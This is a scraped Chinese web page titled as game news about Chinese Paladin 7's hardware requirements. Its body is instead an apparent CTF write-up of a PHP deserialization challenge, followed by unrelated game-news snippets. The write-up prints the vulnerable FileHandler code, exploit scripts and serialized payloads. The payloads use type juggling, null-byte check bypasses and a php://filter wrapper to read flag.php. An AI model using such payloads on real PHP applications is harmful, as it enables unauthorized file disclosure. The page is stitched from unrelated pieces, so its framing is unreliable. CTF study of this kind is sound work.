2. 程式人生 > 資訊 >《仙劍奇俠傳七》推薦配置再更新:中畫質光追需 RTX 2060 以上顯示卡

《仙劍奇俠傳七》推薦配置再更新:中畫質光追需 RTX 2060 以上顯示卡

阿新 發佈:2021-08-06

直接給出原始碼

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    
 
public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function
 
 write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            
 
if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = ""; 
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

程式碼大概看了一下,總體解題思路就是構造反序列化給str變數,當執行這個主函式進行反序列化時,

呼叫了FileHandler 類,進而讀取flag.php。

首先我先嚐試構造了這樣的exp:

<?php

class FileHandler
{

    protected $op = 2;
    protected $filename = "flag.php";
    protected $content;

}
$A=new FileHandler();
$B=serialize($A);
echo $B;

O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}

為什麼要構造op=2,由於沒有搞清程式碼執行流程,一開始想的比較簡單,就是直接進入read()方法,沒有細緻考慮destruct方法

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = ""; 
        $this->process();
    }

看了師傅們的wp才明確知道構造op=2 是為了當自動執行魔術方法_destruct時,繞過if($this->op === "2")這條強型別判斷。

2==="2"為假,而

進入到process()方法中2=="2"為真,執行read()方法,讀取檔案。

還需要知道的是

此題的成員變數是protected屬性,會在變數名前加%00*%00。此時要注意is_valid方法,%00的ascii碼為0,

是無法通過檢查的。

繞過方法之一是:

簡單的一種是:php7.1+版本對屬性型別不敏感,本地序列化的時候將屬性改為public進行繞過即可
<?php

class FileHandler
{

    public $op = 2;
    public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
//偽協議轉化為base64讀取,php程式碼無法直接讀取
    public $content;

}
$A=new FileHandler();
$B=serialize($A);
echo $B;

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

傳參得到flag。

還有一種繞過方法就是

php的序列化字串中只要把其中的s改成大寫的S,後面的字串就可以用十六進位制表示

O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:10:"*content";N;}

序列化完結果看似是沒有%00,但是直接傳參得不到flag。

其實可以用指令碼可以發現是有ascii為0的。

<?php

class FileHandler
{

    protected $op = 2;
    protected $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
    protected $content;

}
$A=new FileHandler();
$B=serialize($A);
$B = str_replace(chr(0), '\00', $B);
$B = str_replace('s:', 'S:', $B);
echo $B;

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:57:"php://filter/read=convert.base64-encode/resource=flag.php";S:10:"\00*\00content";N;}

傳參得到flag.

總的來說這題涉及到的知識還是挺廣的,對於程式碼的執行流程一定要清楚。

相關推薦

推薦配置更新畫質 RTX 2060 以上顯示

8 月 4 日訊息《仙劍奇俠傳七》目前已經開啟預售,將於 10 月 15 日正式釋出,同時提供實體版以及數字版,將在方塊遊戲平臺首發。根據網友投稿,今日官方再次對這款遊戲的配置資訊進行了更新,加入了詳細的光追配置

》公佈新視訊峨眉仙境、神祕苗村介紹

8 月 14 日訊息 《》官方微博在昨日公佈了《》的新宣傳視訊。

7》配置再次更新 門檻2060s變2060

7》將於10月15日中午12點正式解鎖,近日,《7》官方網站更新了遊戲的配置要求,遊戲的入門配置降低,從2060s降低到了2060

推薦配置要求更新,開 RTX 30 系顯示

8 月 3 日訊息國產 PC 單機遊戲、系列最新作品《》將於10 月 15 日正式上市,已經開啟預售,Steam 和 wegame 平臺將於遊戲正式上線一週後上架。

喜加一,《試玩版》現可免費領取

2 月 2 日訊息上個月早些時候,《》試玩版開放限量測試,但僅限於部分參與預約的使用者。瞭解到,該遊戲現已免費推出,所有方塊平臺使用者均可免費領取。

》試玩版將於 3 月 31 日上線 Steam 平臺

3月16日訊息國產單機遊戲《仙劍奇俠傳七》試玩版已於 2 月 2 日上線方塊平臺,玩家可免費領取試玩。今日,該遊戲的試玩版也出現在了 Steam 平臺,該遊戲已可以搜尋到,不過無法進入遊戲詳情頁面。

》上架Steam平臺 年內發售售價未知

今日(3月18日)國產單機大作《》上架Steam平臺,遊戲將於2021年內發售,售價未知。遊戲試玩DEMO將於3月31日推出,玩家將能下載體驗。

6 月網遊版號釋出含《》《全境封鎖 2》等

6 月 28 日訊息今晚國家新聞出版署釋出了 2021 年 6 月進口網遊審批資訊,共有 43 款遊戲獲得了版號。在這之中,包含移動端、PC 端以及遊戲機的遊戲,遊戲運營商包括騰訊、網易等。

》過審,官方人員表示即將開始宣發工作

6 月 29 日訊息《 7》昨日出現在了最新一期的進口網路遊戲版號名單上,堪稱有生之年。也正因此,很多期待已久的玩家奔走相告,激動到無法自已。

》將支援英偉達 RTX ,今晚公佈實機演示視訊

7 月 8 日訊息國風遊戲《仙劍奇俠傳七》目前已經獲得版號,將於近期正式釋出。這款遊戲使用虛幻引擎 4 製作,根據官方訊息,遊戲將支援英偉達 RTX 顯示卡光追功能,帶來逼真絢麗的仙俠世界。

》公佈RTX光線追蹤演示視訊

7月8日,B站舉辦的高能電玩節首場直播發佈會”高能獨立遊戲夜“,軟星科技釋出了動作角色扮演類遊戲《仙劍奇俠傳七》光線追蹤演示視訊。本作注重劇情和遊戲性的雙重體驗。故事圍繞人、神、魔三族進行展開,在保證精

》公佈 RTX 實機演示視訊精緻倒影,遊戲可潛水

7 月 8 日訊息今日《仙劍奇俠傳七》遊戲正式公佈了最新的演示視訊,展現了應用英偉達 RTX 光線追蹤技術之後實機遊戲場景。這款遊戲圍繞人、神、魔三族進行展開,首次採用第三人稱的即時戰鬥模式,相比前作進步明顯。

》10月15日正式上市 預售開啟

PC單機遊戲、系列最新作品《》將於2021年10月15日正式上市!

》將於 10 月 15 日正式上市,已開啟預售

7 月 28 日訊息據方塊遊戲平臺訊息,國產 PC 單機遊戲、系列最新作品《》將於 2021 年 10 月 15 日正式上市,目前該遊戲已經開啟預售。

》Steam/WeGame 版將於發售一週後上架

7 月 28 日訊息據方塊遊戲平臺訊息,國產 PC 單機遊戲、系列最新作品《》將於 2021 年 10 月 15 日正式上市,已經開啟預售。

》四名主角介紹 帥哥美女亮相

今日(7月28日)《》官方宣佈,遊戲將於10月15日正式發售,目前預購已開啟。遊戲官網還公佈了四名主角的相關資訊,一起來看看吧!

》實體版、官方設定美術全集開箱視訊公佈,已開啟預售

7 月 29 日訊息系列最新遊戲《》目前已經正式開啟預售。這款遊戲畫面精美,支援英偉達技術,將於 10 月 15 日在方塊遊戲平臺首發。

》四主角海報公佈 兩位美女很可愛

今日(7月30日)官方微博公佈了《》四主角海報。愛寫日記愛做飯的月姐姐,天上掉下來的神祕修哥哥,乖巧可愛的霞派弟子小晴,活躍氣氛小能手阿遊登場亮相。

》角色背景曝光 峨眉仙境神祕苗村

今日(8月13日)仙劍官方公佈了《仙劍奇俠傳7》新宣傳視訊,在此前視訊霞派弟子白茉晴、苗疆少年桑遊已正式登場,今天為大家帶來的是他們二人的日常相處點滴,及更多背景介紹。該作將於2021年10月15日發售,預售

》全新遊戲截圖公佈明庶門與天師門

8 月 26 日訊息 今日,官方公佈了《》的全新遊戲截圖,包括明庶門與天師門。